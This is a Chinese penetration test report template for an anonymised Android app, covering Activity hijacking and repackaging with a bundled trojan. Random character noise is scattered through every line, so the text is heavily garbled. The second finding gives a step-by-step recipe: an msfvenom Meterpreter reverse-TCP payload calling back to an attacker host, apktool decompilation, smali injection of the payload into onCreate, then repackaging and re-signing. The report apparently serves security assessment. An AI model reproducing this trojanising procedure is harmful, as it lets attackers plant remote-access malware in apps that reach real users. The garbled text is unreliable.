8 k, J2 O- r0 h! ? 8 M5 @7 N( R4 q8 |/ B4 ~
: x" T+ h7 v- m: w5 X5 C$ C& ~6 \, {+ v

4 E' p% c- n5 a. m0 t . `: z$ y8 F- g8 v* F1 k 文档编号： / o5 D K+ u" V1 f4 f9 D+ m9 P% ^ 4 c3 O* N0 g" p2 Y6 r' t

. [6 c4 f7 C3 Z' J" x5 Y; R i, F7 C/ g/ e: Y 6 E: y0 B% {( i/ R 6 {" T' p3 ?" _0 \/ d

1 O, v) h9 g- C0 n ( E8 ~' j% h) J8 N* s ? & X- T4 i, I( Q3 `- _ a! z [* G; d9 g! K9 r

6 i% i2 a6 c; _; J$ m4 o 7 p# S# B) X2 L* a1 _( [- \7 E 6 D, Q3 G5 x# L7 K% A' d 9 z- I; c2 q U9 F5 ]

7 ^1 A- y9 |2 N; o 4 M- c, U0 F% Y5 S+ G 8 j4 M1 b f" S" V0 C0 X4 _/ Q. N. u0 d" e3 @

) ?4 y. [6 P* v0 {/ h' @ p! Y; X9 c! v% W& o- C 2 d- V, _0 b$ `8 v1 W% H2 a0 L. T, _$ L- I0 J- e1 I

- ^* n" j9 C9 }, K 9 ^* _. |% i1 E3 [& ?8 L! \2 Q 某某某APP渗透测试 7 Q5 H. }. _ L K4 J . Q7 p. W j& X- U: L0 g

& D8 b3 v; ]( g, ], b% R5 C* M# a3 V( ]2 W 3 G$ V7 T) E V/ D& j. o4 ]& l. \& {% T3 l# n, n. \

. a8 Z% {: d8 s- Q' R # {5 z2 ^4 P r, L5 s! K) K ) S% n0 k0 ?, E. @# r ) g+ Q, G7 q) w2 X- e, C! x A, I

' z6 A( v% e% W/ B" D" r3 T- H& G1 P, T. Q$ B( e G8 p) \+ d9 f! [" C% u! W f; b# \1 h# q# @5 j n

1 y+ T, e! ^% I) g! L 2 d$ j* c% j4 N$ H/ E! y / S2 t1 ?3 }3 g1 [9 A0 e( f& ` Y5 N- X7 @8 `

, D! |0 t) q, O% P% @ * Q% D' k0 a6 k7 t) A5 Y' z 技术报告 0 u% [5 r8 U' _# n9 D$ O* G, p' _3 F, p- K; z) N. B: N

$ i3 i0 w, @3 ~! x; k 5 H/ M s, }4 Z* b0 { 5 e) A# J6 P) W# u9 t4 H3 A ; ?: Z+ N1 a' v! T" r

; T# S) i2 @, |9 q, W ! J" M1 J( j7 ]3 @% x% u/ P t + ~4 z& J S$ n0 \$ l* N2 d; H/ R w! L% A; ~- x* r

) | j8 {1 e, A1 U. u/ W" C$ p$ O ) ]( D% v* {, e. V+ z# h # Y" ^/ i( Q [9 j9 i7 z4 y + R+ i% R% E' C. L! N

7 N0 T( U$ Z9 h3 j+ D3 v6 x! d4 U2 c 5 N# j, Y \6 m6 M, B9 ` ( E* u! y" \3 e) G0 z. V. I / \3 B6 q) s3 a5 _9 u

4 o+ T; g! ~) M3 V! R. q& Y% p7 R) t & @2 E. [; I% n5 R 3 M. F( Y7 y, T- ~4 J6 L% w

" _" Z. O; _+ L- x 0 q C! J0 N& z9 j) B6 E 1 W8 H' @/ g- P3 f* a0 d, O5 ^9 d 6 o+ W2 F0 j$ E2 }7 ]+ @1 n

+ _2 S. ~5 g5 ^. } 7 `+ {/ L4 y$ x( T0 i * q: x; [* u+ \- x * T) i7 x& o d5 D! s' m9 R

$ Y" ?# F3 \* S: T9 Y' V% q; C ( g8 C3 L" T# ?/ e " H: g0 H2 W+ K- d' @$ J6 L4 @5 y; o. d p5 b" i

; o# Z* h8 D/ a$ i0 N0 O6 c+ r# J F( A2 d W# |5 {+ r . }* |5 Q1 M2 u# N* u

5 T' b; h' W8 Z. p. L2 ` 0 Z& o+ P: q3 y I! d5 \ - X' X1 L$ J& S3 t5 b" c0 l/ B + y3 y- l: E( {" @0 C4 L

% Q. B% j8 U3 U2 ]1 `& S8 O+ O3 f; n( z5 Z, I4 H # t% q: Q' ]2 p' X% w! Q) f2 D4 |9 z

8 B4 ]) Z4 P1 N9 C% m4 @+ Q 6 F9 M" d* l- M; X, x: _2 Y , r. M' r' v) m ( V6 z. g U1 u% F3 O

1 q& `; l( A: Z1 @% ?/ q& Q : j) d. H9 ]: J! w, F: _ ! O; L3 \1 H( B # a& R) _) i2 l T. a& S

3 I6 i9 v' F3 T2 h: J0 J. z! H ) O4 v& A B* D( g+ r1 r1 j # r. c9 c- z1 P9 ~% H" w- k7 ~3 r

( w, U4 X% V# D. _3 _4 j % [( t4 f; a4 C& s5 t) D, _ ( x$ o& u; d1 C& W! d: r # m6 h* C* g% w; \6 j

; r4 f; M5 X" F4 O ! h2 S, @- K8 y: z 5 G9 i F# S# i: V2 p; _ / } u, [1 C% I

) c4 k5 u) |7 v% [+ R$ d- L* S2 w" Q5 R3 I% ^ b5 i7 I5 S* E : v' u% N# ~5 ~3 ^ % X0 X. F' b) Q8 t3 t

' |0 c5 z3 B* g * B) I" T, \( n+ r$ L ( w! U; s' n% b # Z8 w6 ~) h% t4 l

1 F! k1 q* p& z& n' `* {( N% s+ q% U7 `0 I3 C 二〇二〇年 . Q9 S, N4 U9 e9 W* L ' T3 ]2 f& f0 u+ Q2 z+ |

3 L7 x) }+ o& Z$ ~! R+ W/ y 8 [" V8 ~4 T: ` A$ E 目录 * Z& p. n8 j/ |% E! S/ e1 H5 ?# Y; P9 l5 X h2 p

6 l0 j" D6 Q; H& D$ ^! y0 ?( J: x) t2 C! T , Y' j8 T% D2 b) ~ " h" W3 }. B5 }6 k

g* Q2 u% W( J+ R # ~; e W/ P8 J3 ?) j H& P 1 概述... 3 0 ?. a2 h! M* A( W. U" c, b( |# F

4 e7 I/ n$ x7 V/ s/ r/ ~4 s; _1 _6 }& K9 O 1.2测试时间... 3 3 u; u# o7 F0 Q 0 W" Q9 D! a- i# U( I8 d

e: Y5 z3 }9 v- ~$ S + V4 [$ ]* b2 ?/ Q/ k 1.3测试对象... 3 8 z g! m: |' {. g! a1 l) x1 Z & V5 {! C; B) z2 E$ b2 o- ^6 z

( }4 t( d8 ^1 W- @1 S1 s- i x" B' z/ D4 `7 }7 L* X& U1 u 1.4测试结果... 3 & V# ` Q- s3 }5 w 6 J# O% g1 l, {) W9 `- V9 L2 v

; R5 R- {6 L1 |8 P/ V# I7 S1 w; k- E% U' h0 ? 2 检测结果... 4 7 E7 @! o; z1 F5 a2 R7 _: } n0 r( b a( ]% f i3 n8 h$ o7 F

$ i* j/ ]$ ^7 }* [4 _6 v 4 A) [; C# B4 ?, @& Z 2.1 某某某... 4 ; ~3 f4 H( q. B9 N4 [' k2 o4 [( q6 k

# T# M% Z: N; S1 `( J3 g } 0 b7 N. u4 X, }) Q; W' z3 P 2.1.1检测目标... 4 3 x- H+ w, R" m% \' m! @3 D# B# Q 1 l# W$ ~) @6 \. K1 F! i

0 j# _! [3 `& B/ A# r 4 k& q3 R' h4 O 2.1.2检测结果... 4 % s: v- t9 [; k8 R) p4 @4 f5 y Q% A; b. g' q, b9 P7 N

3 z/ ` H ^; b; }5 T & L$ f7 l! L2 [" @( Z! d 2.1.2.1. 4 - H; d' v5 S {- v- a$ ]+ s D& Q' Q2 A; S, ~$ \+ d

8 ~7 i$ u6 J+ e: _6 d ' _* } s' |2 M 2.1.2.2. 6 8 V: z* X5 q8 D4 I, G. x . j7 `! U+ Y2 A9 S' J

4 g* y: ?. o2 o: y0 g8 Y% `$ f3 p$ t6 ~, S, }8 d $ C }8 t3 D& z. v 0 j$ M! f* \4 ^. |

' }7 H3 ]* ~9 ^# S$ f/ X 2 o3 q+ P" } Y1 s& M 1 概述 8 n3 J) c. `2 c+ Z , `" _# Y7 O @( l

$ I+ q8 E+ N8 a 7 ?5 U, a7 _3 |. t3 E8 |: p! J 1.2测试时间 , c0 S. z0 T K ! c$ x- k! L% u8 I; c# H* R2 b

- C+ Z2 {5 M/ ?0 U# @6 t; t1 X W+ ?* _4 ]; \# o4 `6 t 6 [3 V8 f" o2 _; R. L: q J, ~1 k6 z/ W 渗透测试时间 6 B- ~4 m! k" U0 S: H' T0 x ! C$ f+ ^- d# L6 Y 5 k' a; ?; F, r9 b! G: M6 n+ \ + K* r# j4 O- u& r' i) E' N7 M! ^
; I" q+ ?5 N; O" z2 }0 G. u# I - M6 H! ^8 I, W) s* l 3 u0 t W& n0 z0 n$ s V1 i+ Z$ \|$ C5 H. s+ V4 Q R0 C 起始时间 + O( O6 @, T ~: [" T 2 h4 H4 B2 h" d% ]$ l* ^ ; [* i0 W4 I0 _% @ * d+ Y m- S) b, m2 u7 P! Y	( W$ a& b( q; f. N; E1 T ; D! P9 c" V! H 1 b+ E! ]2 l, \5 Q% k & v$ B/ i$ X& _. d2 \0 ^% `( C 2020年4月6日 & j0 {* t2 y- f* v. Q $ n: E8 P Q% s' X+ [1 } ! }" ?, A6 d" c1 s4 B; J+ y / v( u( \|, g" c# [6 ~! w4 m. c
( V, W+ W7 Z7 M6 X8 `: D. N1 Y+ [7 h* E. \| % q$ i/ M; t; ~- I( J9 M8 [6 c6 S/ U( G6 W 结束时间 7 P* x5 W8 d8 W$ T9 r( Z/ h, } 0 H2 z- @6 e; t* r# l$ L. S . P, _* W, \0 Y 1 N0 s1 k* V# {% R7 \|/ _	. v3 A( c& L b % O; E3 e) X3 R. T' u. T! f 7 X2 {, G9 \2 b * N2 W" D/ ` }% ^8 x( v9 X 2020年4月9日 & W& T; z) c2 q8 T ( {7 D- i( G/ s' T * L$ C4 H7 a3 [! c) V& ? ( s6 L0 I S$ O" m

' J( S- m3 t% c& k9 ^$ `- r 7 L7 g$ y$ f; b 1.3测试对象 " E: s8 V, Z z; {8 n . g# b5 E2 w$ ^" g

. C7 d) j3 T' G0 ^* z' }1 h; U ) o, q y+ x: v( f 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 9 Q ?; ~, |) f4 A 8 f I& ?! Y& f3 F

' ?. t, i# b6 J F9 G: m1 d$ k. K3 X5 b; M+ s 表1-1 检测对象 9 M! r1 e/ Y6 l) n: }. A, ^* T" }! V1 A R% K- K* P* P$ u K5 r

) v# n- J6 n+ [% v3 V" x/ s: ~5 Q& p: h, X! O9 W & K X1 L$ g3 a8 U4 l2 u ! u1 g4 G1 H. O/ G4 p- }# p 序号 5 ^7 ~# c, O U9 U 9 s4 x0 j- X9 o# A6 f2 p% Z 4 E# I4 l" E7 ~ ; `) \|" \2 {4 Y: p	/ O9 Z$ d4 w, w* A * I" _2 V+ {2 U# f8 @% ` , l- s. z( \|7 b; X/ R 8 K/ {1 _0 x+ L) h4 b. V3 B" e 测试对象 0 q# \|8 P8 p( o( v$ \5 l6 x8 G; W + x8 x% B% S3 e( `- V9 k v8 f 8 y W# e t7 A ! ]% O- s9 n$ Z9 k# p/ I	) d2 o- h( s8 u 4 r6 v" J0 M, e$ n& O / C1 Z6 z6 t; C/ r; i- \6 n6 l 8 `* o% n$ A/ h/ _4 X 测试地址 0 D6 V# @4 h. p$ I5 E* {+ Y5 I 6 ~0 U J2 W6 G- i" I , H' i8 o1 z) ~ m" o$ M+ N9 h2 c6 v/ n S- u" p, o3 _	; ~; @0 a! O( i# m ; u9 q, I1 l7 T. I6 i: E; s; s ; y1 C) z1 G- m% P1 h 8 W! d3 g ^3 H1 Q3 m3 d1 G# o 安全漏洞 * c7 k! p G8 N0 w0 n( _7 a4 T * }% T7 R" q5 M( }- y2 N ; t* O6 g6 T0 V* @5 o& T 7 n5 I. k& A3 m5 M9 B; s
9 b/ }1 m7 {) b3 N0 f) z$ e g a# @' a % y4 _, _! ]* Q& N" o( f 9 j1 \|- }3 U* R 1 ! z/ Q1 N. t- S M' I& N( \|' s$ M _4 ^ ! }6 w4 b8 [) Z( e7 D% \* g, \7 L3 Z, a& X! P3 J	% m6 \/ A: ]' L* K ) Q) r+ g6 U0 B1 [0 @1 o" n2 r ! L) z3 E! h2 Z- s; } 0 O% c% E+ \$ E5 ~& [- Y6 K& q 某某某安卓APP 5 C" X N7 u( A& u) i7 k7 X! Y& @. C" J2 m, ? 0 q+ [# B4 L- y( k3 H+ I& b 4 S1 \|/ ^4 \|2 W2 M& K	& V9 @. a; ]6 Y8 R7 b* l5 v . f& L5 L" \3 i ' J9 Y5 u5 W4 \: f 4 M7 A8 s1 \|9 C! V2 x7 J % M6 U1 s' l( }5 y2 e 3 c9 a3 ~# a( t! ]) B9 U 7 F6 \|/ O- b- j2 j6 C : }# v9 p4 A% z( U4 {5 X3 W	2 J; F/ c- D* e4 ]- X) e) @7 J. \. F* S5 w% z' I# u$ ? # S" k9 @5 J4 A$ ]7 a3 y) l8 w& ]1 i3 A9 d, V' A2 o( E/ P/ i7 W' j 2 6 m- }; h* \|5 K( U; d; u7 K $ O1 }9 i; \: g! E& C ) U: g3 q% l O ! f: ^) X6 J& e7 @; ]

6 M2 X8 [) p! F- p" d' ~ ! U X- b3 x2 t 1.4测试结果 ( B, {* g$ G) a b+ l; e" e / A4 y! H; _$ g) o8 {: y4 `

/ `: O& T. M+ `9 n- x1 v) x ' q& s" L8 P4 O 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 0 }3 I& k0 c8 u' m : p5 T* b* Q6 t* j7 u

" F8 h4 t/ V: E+ k6 w, q% b' O q+ @# e( ~) F V+ m* N4 m 2 f* H" u2 t3 p# {3 d' Q % I; E9 \2 A& l% v9 k& Z: h

& p: e5 [9 p% Y ; i- ]+ U6 c4 Q) p( I- z 序号 8 S0 Y3 Y5 D9 G* p + t& ^$ F) R4 S0 [: B0 v8 f

4 b0 r+ o q3 u( ^1 g3 I" Z; Q [* O) B H( o/ H' @ 系统名称 * p5 A$ T. h' a+ C2 ]! o( E; @: z, c, H! W, R

y' t4 Z t' j/ s$ _ % c2 P0 `+ [/ i2 Z: e3 U/ Q: m2 l 漏洞名称 4 Q0 W; v" A, _5 X " o3 n/ O& X- V% \3 b

4 A3 | E- q) t1 g: [ 4 u- @" K7 l3 @4 a4 j7 r# e. m9 o 漏洞危害 / H- S1 X% N! l/ u9 Y6 g+ q# F9 `- T% p3 J) V: s* a

: ^% v9 G+ O2 K) {# X $ K. W2 B5 i0 Z8 E% Y 修复结果 : Q& q3 K- \. E8 c 6 ]* g$ l" i" V5 j/ v4 b

' R& O7 ?( }, D) }8 Z, k- v 9 r1 ^5 h* A6 n' S V: q B 1 . ]5 o7 M6 e% _2 N4 A 1 e% W% [2 n9 l: b

7 W9 q" a" B$ R% b$ }: {: K3 z* ]+ z 0 E' N6 N" z2 T7 G3 b 某某某某某某APP * @1 d/ Y5 i6 _5 @ J9 p 5 H. ^8 k, S l

/ h2 d% a: G4 L6 x8 q$ z. \' k( V& n ' w. a" T' [3 c2 L Activity 劫持 ; }& C0 i7 ~$ J/ c2 ?3 Z % Y4 ], Y9 }7 Q, G4 N

& X* x" s) m t / _/ \& ]# R. p. ^ 4 u( ~' G) u* y/ S7 d& r; r/ H 1 [6 H8 K5 [+ _7 H* l: T1 K, G

_7 `, X1 ?+ U. T5 h ! y( c: a0 a# g* w 高 0 A& K, v6 h' W0 D 9 k& V( q) f4 P

4 H: b- p! N* b$ u& ` 2 J _9 R( O8 V8 c; r 6 {, x$ k: L+ v* X7 f 0 k1 y& A, b1 \% D. A/ O/ P

4 d1 ~# u1 S! a6 x8 z, D) E' ? " p& _. A0 C0 \ 2 : {7 W1 y4 ?& I% s2 l3 ]0 X $ H) q7 l/ g k2 y P5 W( Q

# Z B) S5 N/ L; H l$ J , }& j! j* ^ u2 T4 }* J 某某某某某某APP * P( R! r& w8 Y& H& ^ : F: Q$ q1 V" q: g

9 V2 h: q0 j k, ^$ _) g # P+ N7 f; C( O2 L8 G4 n 反编译二次打包捆绑木马、篡改APP代码 2 [: |" t K; k& e1 X2 e * [; [2 P) n3 \! Z. h( B5 N# n3 A

j% f1 i7 s( q" o4 f 2 _6 n) o& y7 z5 q% I( V; ?) P 高 6 t- e/ y1 A# i7 X6 K [' Z1 C K2 x4 v3 {

- S2 {/ w! E2 b7 H7 \, U, Z 6 c- c) I% Z0 G 0 @' w3 O0 ^6 i, M5 q$ E4 x6 Z 7 x! k& O8 H% j

: }5 g. g* B C( {& P5 g3 D + u ~2 A) r, \! t$ P' L# `" _ & ` j2 a8 y$ d, Y0 O. S $ B9 J& Y7 s( @6 c

9 n. Y' r. |2 {, g X # F$ v7 ~- g) w3 [ 表1-2 测试结果 , {- } k& |+ T/ s J % W: i" o2 ]. O. k1 ?) j: ]: X: {; V

: U- P& P% [# R; n6 i& w1 h1 Y5 J * `/ [! V/ i6 G( C7 N6 G0 x * d8 R0 v, X3 P2 \ Q% L # ^8 {0 C9 S* K7 h

- A, m9 G6 v: o9 Y% L" P 3 }: ?( K# C4 B/ G# q- ^3 Q 2 检测结果 9 s* i. T+ t, N% a p# q 3 H. B' ~# e+ ^

! k: ]! q N9 B" T6 S + w: A( H" A- e& P! s7 { o 2.1 某某某 & i& E+ m) I7 X: Z! k % _( n1 W0 w% g+ K& A

' ]! q4 U' ?3 m; J: N$ n9 w5 X 4 z! V- p4 G+ H5 |/ z 2.1.1检测目标 0 ]6 S5 M7 f$ W; m+ | W # K9 y& O7 a" f' e0 l2 U I

4 Y) d( f9 J& ~& B, a , v+ {5 g# X: x2 l 目标地址： 某某某某某某APP 7 d6 p+ A2 e$ I2 ]2 N $ G: x9 Y5 y& s7 g# y V7 |

5 L& D2 I) J/ p- ?% T( M ( P2 n0 B# a$ Z2 n$ Q" k 2.1.2检测结果 " b7 C, m* I/ |3 Z z2 k8 k/ ?: w , F( j: Q/ U S, H' X' E* l

$ C1 h, G& C% m' f: N4 p2 R' F" h6 \& R! ]2 g |" N 2.1.2.1 3 }0 @ I7 Q9 O* C % H% _" @3 N! q/ ~; `4 v

3 W1 T; Z3 M. z' ` 4 N b8 ?0 Z% }& i6 q 漏洞链接地址：某某某某某某APP & V4 Y. K4 u) L8 F7 _) y ' @- L- ?; q' z% ?% M* E% e

, H6 O/ K% V/ w) w- y& ~) A; Z) b" C2 _$ U ) C& P1 I+ k" t! h. H 0 L6 G- b( {7 G

+ t0 H6 k5 s3 B' g , u* ^/ \9 ^( z# o; ?- z7 V 漏洞分析及取证： " b- z8 ^. `- l, H- _ & p+ f( O9 P% G+ O

5 {' _/ t8 r* B) [$ [5 ` z7 C5 ~: S1 L4 e 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 3 v# m( q# W6 p+ H ' b3 u7 p. c0 f7 i8 I

! L% C0 D5 x" A6 C 9 K5 l* h8 f1 ]# e7 i & Y- I7 d" M" _5 v4 X5 X8 T0 K 3 H x$ M1 n( ?4 L% Z; S

$ x" i8 y3 R6 V: c" T . ~9 m N/ v+ l- s1 d# z) o ) G/ S& v7 W4 Y6 C9 y5 T3 O& W, L2 M$ k k# L* _; W2 z0 P

) E3 V; E. ^6 u1 k& {1 e 6 z# n$ A9 t$ B& k" g4 { 3 Q5 a; b$ Q; { . {. ~7 G* E; q: r0 \$ R" f

^3 A3 p* B& d: h) q9 x 0 w1 G- f. ?8 X; T. Z- G" O, G # M& j9 I; N8 y0 N: A. P4 [ , I& M- O" \. ^2 w& }1 x

+ _3 y) ?! V0 z6 |7 @! @ / `# g! {( R/ z M3 [, S + y+ y# ]- U8 a- W' g" o . ]0 N! E8 W( T

! r; t4 x6 S) K; @' E& F J: w0 \ P7 g4 V7 y 漏洞危害：高 + n* U# M2 d% [/ [9 v " {6 F& G. E+ A/ q' A

; C& L8 ?* P- x5 { e . \|8 X+ {% [, o. l* u ( d0 t2 \|! t' `- S! J& ? 9 {4 \|1 I- l) ]3 y 严重程度 ; P6 X6 t# z s3 Q4 @3 j% X. l ! G' O# {0 W P' P. X" _3 } ' N* h" @% z \|' Q5 ]" a' l" A! i3 f	- ?7 w$ Y. @6 C8 N% y% v8 L% t4 H 6 g; M# m' r1 }+ D! K% Q, t* a : H9 e/ W5 Y% z) \|% b. N# B9 f 6 K: Z8 g7 z" v6 @- a( M 高 1 c; G3 ~' N7 b1 R( `! _5 \/ F0 _ ) w- c! R5 P6 ^+ E5 _ ; w6 c. r! r: v' `4 z6 x & O; f7 ?9 X. ]. ]$ J) `& U' c+ J, b	4 o+ x' G. R' S 9 Q: l$ o% h' I% ~; D* X5 T4 P* \| $ {, U; {( A: O% H, s \7 _( F) E" @, R ■ / L- ?4 R8 G: S7 e, I / t+ D3 a# V" m 9 Y+ c1 c* E8 c5 P. x + u' \|7 d8 D& q1 C	5 O- S; v/ V$ r( V( E, ?9 a n: O' C' j8 p9 o2 c $ J0 S. {+ B( C7 a3 i& c/ S8 r" p: M9 z" D! p3 T8 L4 N4 ? 中 " Z' f5 j6 s' `0 K5 q8 \2 v& U& c5 T' T, ?; h& `) w2 c , [2 v" x( X; n( t( s. z" ^: v$ j8 C ) M4 c4 w- y: s/ g& [1 `	6 \|0 i( d* x( D1 [# \|+ `4 j! J. N2 \|& v0 R8 K8 J- J ' g; e1 e! ]' ?% j* } & D' A; K) }- z: y* I4 X 8 Q2 U# f) H! r, ^ 9 O3 F) Z# E B9 ^& O; F / u, }1 q2 d& r3 \ / a* j$ t3 e3 _0 X3 c$ h# \|, Q) b	. D2 e( y% @, g# K8 F$ g# I' j! M# v 1 {! {5 N3 X, X) H# [! X4 u) K: l0 J 3 Y c4 g, [% @. t' U* I2 M + i9 g5 H0 ~7 W0 p( ~) w 低 7 P, g+ H. x' q ' k0 B$ P- J' \|9 W0 z2 k; C( M+ X( n 1 P' s' j+ L" x2 e2 a9 \$ X) G3 o9 n	: e. ^6 X, c' D, g7 T4 \+ M5 c+ {9 L4 D; B% W3 a5 q 3 H3 V* x* Q! C+ d# `8 J* k5 \|0 B8 i2 W ! ? `& W3 E1 x. G+ Y4 \* O Y7 e4 F$ b* P' z# a8 \ : w: b: `; s& ^% p" I3 D1 A 8 {) M5 Z: b+ L j0 S" ~& y

* ^$ B* z8 t/ H! s+ Q; Y2 K . i4 j& O+ j( Z+ _+ H - Z& h, L1 T2 I( X+ g8 `6 K C5 D ! z# h! t! |3 Y7 M* [8 B) r, J* s

) m- ^* S( F% d" y 4 N7 I2 R2 |8 k" M4 k3 E 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 , k* u# |+ G5 a3 f1 y& t , k. ]4 E1 a) ~; A& o9 U

. g: H' a* E3 y2 q : W4 y& \5 ~1 [ 1 }/ V$ a8 z" ^2 L" q( _ + u4 ?$ S& p3 {: i: v- I

* b J. e- ?) w( R2 Z4 Z # C# G( j6 F2 g0 d8 X9 q% C 4 o" G- c$ Q4 N4 q9 M7 Z, n. P; [6 g0 K9 s5 \' d' y

* o, X3 M( H- n/ k$ h# g 2 L7 K; ~) n& X1 t4 O. g 2.1.2.2 % o/ X- Y4 K( _2 L& X0 q1 M; _. M" l D/ i0 G4 V* g, F: A

- \# \( H8 _+ n# t5 f) [4 D0 | 3 z6 Y1 {; g7 [1 `& H9 x/ E 漏洞链接地址：某某某某某某APP ( p; s7 j4 K* N! g" ~0 [3 F9 s0 Y6 u! J" W X

0 v8 Y8 O' o" i + W; ^' k" C: ], V$ y 漏洞分析及取证： . ]/ I: T: z. _ 6 J% A. ]9 \7 Z. F, v' n

/ e: ?. B/ C& M$ D. V0 B/ {$ o M; n, M" t; T 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： . D [) c! G3 f% _ & h) x, @6 o3 z0 G2 I' k

" }# A( G# K; N6 ^8 e- P3 x# q- {. e/ b/ @ @) B3 j 用Metasploit 生成木马 apk # l) N. B6 {# E* I, R+ K % u* C& I9 ~. N& [

0 X- l4 w* M6 ^$ g+ {$ O 5 j$ O% f4 H0 n& l" ? msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / c. q* u( R: a, ~+ j; N4 _, i 3 s1 M% i* o; s

( j: t. T3 v# S+ p; Q ) x) V O3 [' o, b3 |6 H Y 反编译目标apk和木马apk ) v! ?9 d' X l: ^0 V* N7 r6 l# Z% U, X

, a& `% m& E( i$ m8 p 0 n9 K$ D* j" i apktool d target.apk
, Q1 N- U! t$ o3 c" K3 P0 y1 n# |$ ^; z4 c, n* w3 w0 q$ k apktool d cockhorse.apk [3 U$ d( F' ^4 e; D0 ~- k8 `! U& O9 \7 T0 D0 k

6 H& V' b6 c$ Z5 K! R9 q V7 f# p/ q, [* A 木马 apk 注入目标 apk 5 Z% g! L" z! l: x ' ^/ ?8 ?: B& o. Y5 t

4 N3 S4 y5 B3 Q7 r+ t 4 A' b7 D) q; J- k 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
. f6 }' W5 }" K # n) y' R5 J, v/ ? invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ' |' p4 @$ s+ a4 @; o Q6 L7 h 2 O( _ S9 C* R9 W7 j

6 y @: @+ _9 }* {$ f * B8 y) D; i' J2 K6 i! a 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 / _$ ?) B7 ^6 ~* @4 Z" @5 z6 B$ p7 d- h" H! e" }

* k" j$ t, M+ ^: a$ u8 v 2 ?" o9 |, { E7 R 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 ' d. k8 e% L0 t4 g! W$ z 5 e) _/ v: K) r2 Z4 }

) \. @8 j# n+ a3 y& B L + ]* }$ |7 m+ ~1 B' \7 m 回编译生成最终 apk " q# U, I$ }& f3 m" w' c: _4 F- s8 Z! y9 Y

: |' A3 K* b \4 } : }& M, z2 V$ b, G3 h8 k9 Y1 D 重新打包 / Z- Y! X3 p4 k 6 O; q, ^: u0 M* i4 y

1 ~+ Z2 R0 I) J2 P( n9 k# o z $ W3 ~" Q/ f$ H7 H5 ^0 f5 v apktool b -o repackage.apk target_app_floder 5 b, u9 ] A$ ~6 A0 j: J. F$ c) Q! X& V$ n" Z

, c$ \7 l& l- |8 v% O j E9 P; D/ e% ^8 U 创建签名文件，有的话可忽略此步骤 1 Q, e5 J/ P+ m0 q ; @: c& S$ L3 f9 f# C

" @! i3 n7 A+ s( y: Q+ W; U 1 q0 ]0 Z" [* c2 i% n/ ~4 x keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 1 e8 L1 M7 Q8 [/ i ! d! y) J% p& r* [' T

. q4 i* r5 f% x ' o5 Y2 n2 }) T5 F2 h! j 签名，以下任选其一 / U! J0 v5 w* y" @( I" F e 2 U" z( Y& Y5 T" G+ i

2 Z* k" c- P! R6 ]' n% U! Q% B6 J - ^7 ^9 c: ]! ]. s9 N# d1 G jarsigner 方式 " u0 P: m# {* i6 F7 C$ N : O7 C6 [. w* h

8 _$ ~0 F$ f- y2 l; q ' V' B3 b$ g( @: t/ m. H jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname * F" M: t* X- n0 `8 X; a : o! s; T; X$ R( u3 T3 V. g

$ k- h8 h! j2 Q ' C0 w& n% _, Z6 t apksigner 方式 + }' R9 X: S' l5 w! h7 K2 C 5 l/ Y: W/ {" v* ^& m# @( {8 J' N8 y+ I

, f# g$ [7 {: U5 H2 y& {% j: J: [9 K6 q. k+ H; w7 B apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 H7 G+ [4 S9 M% A% z . U7 v( f4 R2 o& x* a# E/ p

! I% `) I" w1 m: I w6 f3 \ : Z5 b1 \4 D) e4 ?# J3 g* s 如需要禁用 v2签名 添加选项--v2-signing-enabled false 2 k; i$ P6 Q; k; b8 N7 u$ E# m4 ]% E

/ g9 N* I0 y/ [! l( W . i% M, ?) t% T1 q0 k# { 验证，以下任选其一 $ y7 E3 _ r% H" g& E ) Q& S- T) w: C; m! G; t+ C

7 E1 j5 B- N- f+ T% l0 { $ T/ w, m7 ~# u% Z* j jarsigner方式 , o" A. T' E/ I. W9 Q: l, P % E, `* w- P. {3 M- H4 a

2 A0 W5 _" V7 S - y# b8 t2 R* w: F T! E2 e- z3 E3 O jarsigner -verify repackaged.apk $ A& j0 Y. D8 B% Y1 I) z4 N9 s+ ?- g3 A$ k- g

% g. h: w' P+ m$ y# d: ` + ?7 V3 _' I' V7 n apksigner 方式 ! q9 z/ T) d5 X4 f; P - \4 ]9 M4 i& J' f$ R

' t5 s5 n$ ~5 u/ t' e! J! y8 ~) i2 q5 E$ m$ s0 e apksigner verify -v --print-certs repackaged.apk & c, S5 s9 ~! s6 W% L; Y1 ^1 [! [9 M- M9 o4 j

- M( I& ?5 V5 ~9 t& B k# D: J2 l * J4 u# E7 g: z0 V keytool方式 9 F) f" D {: h& k: e 0 y( T* T r1 @' e! ]5 ?6 R; F) O: O

' z% | V/ ]% F# m) }2 s , S, h+ ?6 Y& ?- f g keytool -printcert -jarfile repackaged.apk 7 s- r) W! Z3 T0 N 2 [( {$ B8 ^6 D I7 w; {5 P

% T0 d$ h# \& T7 a' R1 _9 l8 K " ?2 O: F% Y$ d5 h8 R) F5 d 对齐 . y$ N7 t ]8 Q: O6 p" j : K2 a" b/ \; k# y0 E. M

7 ^( U5 U& G# M$ N. @ $ z6 r7 r; C& H$ D" u, ] 字节对齐优化 ( D8 ^3 G5 ^; f9 N( N $ j; _! a8 }: P

